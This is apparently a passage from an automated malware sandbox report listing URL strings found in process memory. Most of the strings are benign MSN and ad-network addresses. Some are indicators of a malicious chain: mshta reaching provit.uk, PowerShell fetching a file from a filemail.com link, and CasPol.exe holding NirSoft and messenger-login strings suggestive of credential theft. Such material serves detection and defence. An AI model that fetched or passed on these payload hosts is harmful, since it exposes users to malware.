                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: powershell.exe, 00000005.00000002.452948014.0000000012311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                  Source: powershell.exe, 00000005.00000002.448423237.00000000022E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.512617659.00000000021F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.486539543.00000000020F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.544414000.00000000022C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: CasPol.exe, CasPol.exe, 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: CasPol.exe, CasPol.exe, 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: CasPol.exe, 00000021.00000002.530147488.00000000003FC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/O
                  Source: CasPol.exe, 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: CasPol.exe, 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://www.msn.com/
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                  Source: CasPol.exe, 0000001E.00000002.532687990.0000000000364000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: CasPol.exe, 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: powershell.exe, 0000000F.00000002.512617659.00000000023F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.544414000.00000000024C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com
                  Source: powershell.exe, 0000001B.00000002.542881250.0000000000318000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.542881250.000000000035D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/api/file/get?fil
                  Source: powershell.exe, 0000001B.00000002.544414000.00000000024C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd
                  Source: powershell.exe, 0000000F.00000002.512617659.00000000023F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.544414000.00000000024C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/api/file/get?filp
                  Source: bhvD598.tmp.30.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                  Source: bhvD598.tmp.30.drString found in binary or memory: https://contextual.media.net/
                  Source: bhvD598.tmp.30.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                  Source: bhvD598.tmp.30.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                  Source: bhvD598.tmp.30.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                  Source: bhvD598.tmp.30.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                  Source: powershell.exe, 00000005.00000002.452948014.0000000012311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000005.00000002.452948014.0000000012311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000005.00000002.452948014.0000000012311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: bhvD598.tmp.30.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                  Source: bhvD598.tmp.30.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                  Source: bhvD598.tmp.30.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                  Source: bhvD598.tmp.30.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: bhvD598.tmp.30.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                  Source: CasPol.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: powershell.exe, 00000005.00000002.452948014.0000000012311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: bhvD598.tmp.30.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                  Source: mshta.exe, 00000004.00000002.429003088.0000000003BFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479236959.0000000000422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.0000000000422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478821092.0000000000422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/
                  Source: mshta.exe, 00000004.00000002.429003088.0000000003BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/.
